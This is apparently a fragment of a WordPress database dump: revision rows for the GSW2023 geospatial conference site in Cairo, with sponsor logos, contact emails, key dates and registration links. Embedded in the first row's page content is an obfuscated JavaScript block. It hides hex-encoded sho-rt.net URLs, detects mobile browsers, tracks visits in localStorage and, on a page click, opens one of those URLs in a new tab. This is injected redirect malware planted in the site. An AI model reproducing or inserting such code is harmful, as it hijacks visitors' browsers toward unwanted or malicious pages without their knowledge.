accent_color=\"#40f7e5\"][ult_countdown datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_sep_col=\"#311b92\" tick_unit_style=\"font-weight:bold;\" tick_style=\"font-weight:bold;\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#311b92\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_column_text]</p>\n<p style=\"text-align: center;\">\n<p style=\"text-align: center;\"><strong><a href=\"mailto:gsw2023@aast.edu\">gsw2023@aast.edu</a></strong></p>\n<p style=\"text-align: center;\"><strong> <a href=\"mailto:aaelbary@gsw2023.com\">aaelbary@gsw2023.com</a></strong></p>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','GSW2023','','inherit','closed','closed','','3066-revision-v1','','','2023-05-16 21:20:48','2023-05-16 21:20:48','',3066,'https://gsw2023.com/?p=4501',0,'revision','',0),
(4502,1,'2023-05-17 03:53:09','2023-05-17 03:53:09','<p>[vc_row css=\".vc_custom_1680403823446{margin-top: -35px !important;}\"][vc_column css=\".vc_custom_1680403783341{margin-top: -15px !important;}\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1684201412150{margin-top: 100px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Platinum Sponsors</strong></span></h4>\n<p><a href=\"https://www.pix4d.com/ \"><img class=\"https://www.pix4d.com/ aligncenter wp-image-4482\" title=\"https://www.pix4d.com/ \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/LOGO_CORP_HORIZONTAL_LIGHT-300x91.png\" alt=\"\" width=\"385\" height=\"117\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406603694{margin-top: 125px !important;}\"]</p>\n<h6><a href=\"https://www.bdstar.com/en/\"><img class=\"aligncenter wp-image-3987\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/BDStar-1024x223.png\" alt=\"\" width=\"317\" height=\"69\" /></a></h6>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406565735{margin-top: 50px !important;}\"]</p>\n<h3 style=\"text-align: center;\"><strong>Gold Sponsors</strong></h3>\n<p><span style=\"font-size: 8pt;\"><a href=\"http://hdmap.geomatics.ncku.edu.tw/index-US.php\"><img class=\"aligncenter wp-image-3989\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/LOGO-of-HDP-center-final0730-1-1024x351.png\" alt=\"\" width=\"350\" height=\"120\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406679677{margin-top: 137px !important;}\"]<a href=\"www.applanix.com\"><img class=\"aligncenter wp-image-3988\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Applanix_CYMK_OUTLINES_Horizontal_Blue-1024x129.jpg\" alt=\"\" width=\"451\" height=\"57\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1684272005765{margin-top: -25px !important;}\"]<a href=\"https://leica-geosystems.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4500 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/HEXAGON_STANDARD_CMYK_LOGO-300x124.jpg\" alt=\"\" width=\"300\" height=\"124\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text]<span style=\"font-size: 8pt;\"><a href=\"https://www.tasa.org.tw/index.php?ln=en\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4089 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/logo_en_tasa2-300x63.png\" alt=\"\" width=\"300\" height=\"63\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406157694{margin-top: 88px !important;}\"]<a href=\"http://www.robotlab.com.tw\"><img class=\"aligncenter wp-image-4033 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Xiang-Cheng-electronic-Logo-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406965583{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><strong>Bronze Sponsors</strong></h4>\n<p><a href=\"http://www.riegl.com\"><img class=\"aligncenter wp-image-3997 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Logo_Schriftzug_rgb_R-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681676234291{margin-top: 50px !important;}\"]<a href=\"http://www.geosat.com.tw\"><img class=\"aligncenter wp-image-4041 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Geosat-logo-300x170.jpg\" alt=\"\" width=\"300\" height=\"170\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1684202742439{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Official Airline</span></h4>\n<p><a href=\"https://bit.ly/3HLQBrB\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4495 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/egyptair-300x173.png\" alt=\"\" width=\"300\" height=\"173\" /></a></p>\n<p style=\"text-align: center;\">Egypt Air will offer 20% Discount on tickets for the Conference Participants. To receive the password for the getting the discount, please send an email to:</p>\n<p style=\"text-align: center;\"><strong>GSW-EGYPTAIR@gsw2023.com</strong></p>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_column_text][/vc_column_text][vc_column_text css=\".vc_custom_1675473187232{border-top-width: 25px !important;padding-top: 25px !important;}\"]</p>\n<h3></h3>\n<h3></h3>\n<h3></h3>\n<h3 class=\"fancy-title entry-title start-animation-done start-animation\" style=\"text-align: justify; color: #311b92;\"><strong>IMPORTANT DATES</strong></h3>\n<p>[/vc_column_text][vc_row_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Full paper submission (Annals): April 30, 2023 <span style=\"text-decoration: line-through;\">March 31, 2023</span> (hard deadline, no extension)</strong>[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Full paper Author notification: May 21, 2023 <span style=\"text-decoration: line-through;\">May 1, 2023</span></strong>[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Abstract submission (Archives):            .</strong></p>\n<p><strong><del>April 15, 2023</del> ,</strong></p>\n<p><strong> May 15, 2023  (hard deadline, no extension)</strong><br />\n<strong style=\"color: white;\">SSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSS</strong>[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\" css=\".vc_custom_1681902149314{margin-top: -25px !important;}\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Abstract Author notification:</strong></p>\n<p><strong><del>May 15, 2023</del>, May 21, 2023</strong>[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"5\"][vc_row_inner css=\".vc_custom_1668021047643{margin-top: 25px !important;}\"][vc_column_inner css=\".vc_custom_1668021165897{padding-top: 40px !important;}\"][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fimportant-dates%2F\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"300\" css=\".vc_custom_1668192997249{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]ALL IMPORTANT DATES[/dt_default_button][dt_default_button link=\"url:https%3A%2F%2Fwww.conftool.com%2Fgsw2023|target:_blank\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"300\" css=\".vc_custom_1675484507520{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]SUBMIT YOUR PAPER NOW[/dt_default_button][/vc_column_inner][/vc_row_inner][/vc_column][vc_column width=\"1/2\"][vc_row_inner css=\".vc_custom_1668005438919{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_inner width=\"1/4\"][vc_single_image image=\"3103\" img_size=\"120x120\" alignment=\"center\" css=\".vc_custom_1668204801057{margin-top: 1px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][/vc_column_inner][vc_column_inner width=\"3/4\" css=\".vc_custom_1668010702427{margin-top: 35px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][ult_countdown count_style=\"ult-cd-s2\" datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin,ssec\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_style=\"font-weight:bold;\" timer_unit_font_family=\"font_family:|font_call:\" tick_unit_style=\"font-weight:bold;\" css_countdown=\".vc_custom_1668204929553{margin-top: 20px !important;}\" tick_size=\"desktop:50px;\"][/vc_column_inner][/vc_row_inner][vc_single_image image=\"3289\" img_size=\"1149x800\"][/vc_column][vc_column][/vc_column][vc_column][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" border_width=\"10\" accent_color=\"#311b92\"][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-vz-jquery\" bg_image_new=\"id^3189|url^https://gsw2023.com/wp-content/uploads/2022/11/cairo-egypt_shutterstock_1421974805-scaled.jpg|caption^null|alt^null|title^cairo-egypt_shutterstock_1421974805|description^null\" parallax_sense=\"40\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.6)\" type=\"vc_default\" css=\".vc_custom_1668018620108{padding-top: 100px !important;padding-bottom: 105px !important;}\"][vc_column width=\"5/6\" offset=\"vc_col-lg-offset-3 vc_col-lg-6 vc_col-md-offset-1 vc_col-md-10 vc_col-sm-offset-1\" el_class=\"text-centered\"][ultimate_heading main_heading=\"REGISTRATION\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]<strong>Payment of Registration is Opened Now</strong>[/ultimate_heading][ultimate_heading main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]</p>\n<h5><span style=\"font-size: 14pt; color: #ffffff;\"><strong><a style=\"color: #ffffff;\" href=\"https://www.ihg.com/redirect?path=hd&amp;brandCode=6C&amp;localeCode=en&amp;regionCode=1&amp;hotelCode=CROHA&amp;_PMID=99801505&amp;GPC=DY8&amp;cn=no&amp;viewfullsite=true\" target=\"_blank\" rel=\"noopener\">Conference Venue Special Rate Booking is Opened Now</a></strong></span></h5>\n<p>[/ultimate_heading][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fregistration%2F\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1665287063394{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]INFORMATION[/dt_default_button][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fcontact%2F\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1665182763974{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]CONTACT US[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-vz-jquery\" bg_image_new=\"id^3287|url^https://gsw2023.com/wp-content/uploads/2022/11/intercontinental-cairo-7836282477-2x1-1.jpg|caption^null|alt^null|title^intercontinental-cairo-7836282477-2x1|description^null\" parallax_sense=\"40\" bg_override=\"ex-full\" parallax_content=\"parallax_content_value\" fadeout_row=\"fadeout_row_value\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.6)\" type=\"vc_default\" css=\".vc_custom_1684295545972{padding-top: 100px !important;padding-bottom: 105px !important;}\"][vc_column width=\"5/6\" offset=\"vc_col-lg-offset-3 vc_col-lg-6 vc_col-md-offset-1 vc_col-md-10 vc_col-sm-offset-1\" el_class=\"text-centered\"][ultimate_heading main_heading=\"REGISTRATION\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]<strong>Payment of Registration is Opened Now</strong>[/ultimate_heading][ultimate_heading main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]</p>\n<h5><span style=\"font-size: 14pt; color: #ffffff;\"><strong><a style=\"color: #ffffff;\" href=\"https://www.ihg.com/redirect?path=hd&amp;brandCode=6C&amp;localeCode=en&amp;regionCode=1&amp;hotelCode=CROHA&amp;_PMID=99801505&amp;GPC=DY8&amp;cn=no&amp;viewfullsite=true\" target=\"_blank\" rel=\"noopener\">Conference Venue Special Rate Booking is Opened Now</a></strong></span></h5>\n<p>[/ultimate_heading][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fregistration%2F\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1665287063394{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]INFORMATION[/dt_default_button][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fcontact%2F\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1665182763974{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]CONTACT US[/dt_default_button][/vc_column][/vc_row][vc_row css=\".vc_custom_1668205719738{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 